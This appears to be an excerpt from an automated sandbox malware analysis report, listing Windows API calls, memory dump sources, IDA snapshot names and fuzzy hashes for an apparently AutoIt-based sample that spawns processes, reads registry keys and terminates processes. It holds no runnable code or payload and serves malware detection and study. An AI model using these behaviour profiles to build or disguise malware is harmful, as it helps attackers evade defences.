                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                                                  • Opcode ID: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                                                                                                                                  • Instruction ID: 032906fc094d91378a6d64986483b761754d261e1b02b5d61cc05f8db2f6dc85
                                                                                                                                                  • Opcode Fuzzy Hash: 842b6d77a2cf942784fc1cb80210373f95780450b82a097604e26ce594b18ecd
                                                                                                                                                  • Instruction Fuzzy Hash: E621487220412166D620AA35AC02FA773D8AF59305B90443BFC4286192EB9C9D4EC29F
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                    • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                    • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                                  • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                                                                                                  • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                                                                                                                                                  • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                                                                                                  • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
APIs
  • Part of subcall function 00AB31DA: _free.LIBCMT ref: 00AB3203
• _free.LIBCMT ref: 00AB3264
  • Part of subcall function 00AB2096: HeapFree.KERNEL32(00000000,00000000,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?), ref: 00AB20AC
  • Part of subcall function 00AB2096: GetLastError.KERNEL32(?,?,00AB3208,?,00000000,?,00000000,?,00AB322F,?,00000007,?,?,00AB2697,?,?), ref: 00AB20BE
• _free.LIBCMT ref: 00AB326F
• _free.LIBCMT ref: 00AB327A
• _free.LIBCMT ref: 00AB32CE
• _free.LIBCMT ref: 00AB32D9
• _free.LIBCMT ref: 00AB32E4
• _free.LIBCMT ref: 00AB32EF
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
• Instruction ID: 12639a2f2b2f1b66139a449ab9c7c8cf5a374aa64ffdcc6335ee5aaf3ca5b2c0
• Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
• Instruction Fuzzy Hash: F0112173A41B04AADD30FBB4DE07FCB779C6F05700F404915BA9E66063DA75BA148750
APIs
• _memset.LIBCMT ref: 0048B644
• _memset.LIBCMT ref: 0048B653
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
• CloseHandle.KERNEL32 ref: 0048B694
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID: oL$doL
• API String ID: 3277943733-3421622115
• Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
• Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
• Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
• Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
• GetProcAddress.KERNEL32(00000000), ref: 0042408C
• EncodePointer.KERNEL32(00000000), ref: 00424097
• DecodePointer.KERNEL32(00423F85), ref: 004240B2
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
• Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
• Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
• Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00AB473A,?,?,00000000), ref: 00AB4543
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00AB473A,?,?,00000000,?,?,?), ref: 00AB45C9
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AB46C3
• __freea.LIBCMT ref: 00AB46D0
  • Part of subcall function 00AB32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00AB332C
• __freea.LIBCMT ref: 00AB46D9
• __freea.LIBCMT ref: 00AB46FE
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: a2345af1fd97a9099c70e8408b1957244f312d9d45a4becd33e1ae9957c01512
• Instruction ID: 1c94ce7b03744bd6742b3260bb73050bc4cc324fc0880492fab164dc40b9b526
• Opcode Fuzzy Hash: a2345af1fd97a9099c70e8408b1957244f312d9d45a4becd33e1ae9957c01512
• Instruction Fuzzy Hash: 52510E72600606ABEF258F68CC51EEF77ADEB49710F154629FD04DA193EB34DC60C650
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3253778849-0
                                                                                                                                                  • Opcode ID: 31b6c2821ee95968e36053ace308b28e5e0a31ebdb0f388184579a3ae126733f
                                                                                                                                                  • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                                                                                                                  • Opcode Fuzzy Hash: 31b6c2821ee95968e36053ace308b28e5e0a31ebdb0f388184579a3ae126733f
                                                                                                                                                  • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
• RegCloseKey.ADVAPI32(00000000), ref: 00480399
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Opcode ID: 3a69bb563f7b8a3e4012be6cf6d288248e8626f982930bec9f4d163de4be7317
• Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
• Opcode Fuzzy Hash: 3a69bb563f7b8a3e4012be6cf6d288248e8626f982930bec9f4d163de4be7317
• Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
APIs
• VariantInit.OLEAUT32(?), ref: 0045EF06
• VariantClear.OLEAUT32(00000013), ref: 0045EF78
• VariantClear.OLEAUT32(00000000), ref: 0045EFD3
• _memmove.LIBCMT ref: 0045EFFD
• VariantClear.OLEAUT32(?), ref: 0045F04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
• Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
• Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
• Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
• Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
APIs
• _memset.LIBCMT ref: 00462258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
• IsMenu.USER32(00000000), ref: 004622C3
• CreatePopupMenu.USER32 ref: 004622F7
• GetMenuItemCount.USER32(000000FF), ref: 00462355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
• Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
• Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
• Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
APIs
• ShowWindow.USER32(004C57B0,00000000,00B834B0,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
• EnableWindow.USER32(00000000,00000000), ref: 0048B736
• ShowWindow.USER32(004C57B0,00000000,00B834B0,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
• ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
• EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
• Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
• Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
• Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
  • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
• GetDesktopWindow.USER32 ref: 004770D6
• GetWindowRect.USER32(00000000), ref: 004770DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
  • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
• GetCursorPos.USER32(?), ref: 0047713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
• Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
• Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
• Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
APIs
  • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
  • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
  • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
  • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
  • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
• GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
• HeapAlloc.KERNEL32(00000000), ref: 004588DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
• GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
• HeapFree.KERNEL32(00000000), ref: 00458911
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3008561057-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
• OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
• CloseHandle.KERNEL32(00000004), ref: 00458603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
• GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00467243
• EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
• TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
  • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
• LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
• UnloadUserProfile.USERENV(?,?), ref: 004589A9
• CloseHandle.KERNEL32(?), ref: 004589B2
• CloseHandle.KERNEL32(?), ref: 004589BA
• GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
• HeapFree.KERNEL32(00000000), ref: 004589CA
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
• CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
• _memcmp.LIBCMT ref: 00457748
Strings
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID: ,,I
• API String ID: 314563124-4163367948
APIs
• VariantInit.OLEAUT32(?), ref: 00478613
• CharUpperBuffW.USER32(?,?), ref: 00478722
• VariantClear.OLEAUT32(?), ref: 0047889A
  • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
  • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
  • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
APIs
  • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
• _memset.LIBCMT ref: 00462B87
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
Strings
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
APIs
Strings
Similarity
• API ID: _memmove$_free
• String ID: 3cA$_A
• API String ID: 2620147621-3480954128
APIs
Strings
Similarity
• API ID: _memset$_memmove
• String ID: 3cA$ERCP
• API String ID: 2532777613-1471582817
APIs
• _memset.LIBCMT ref: 004627C0
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
• DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
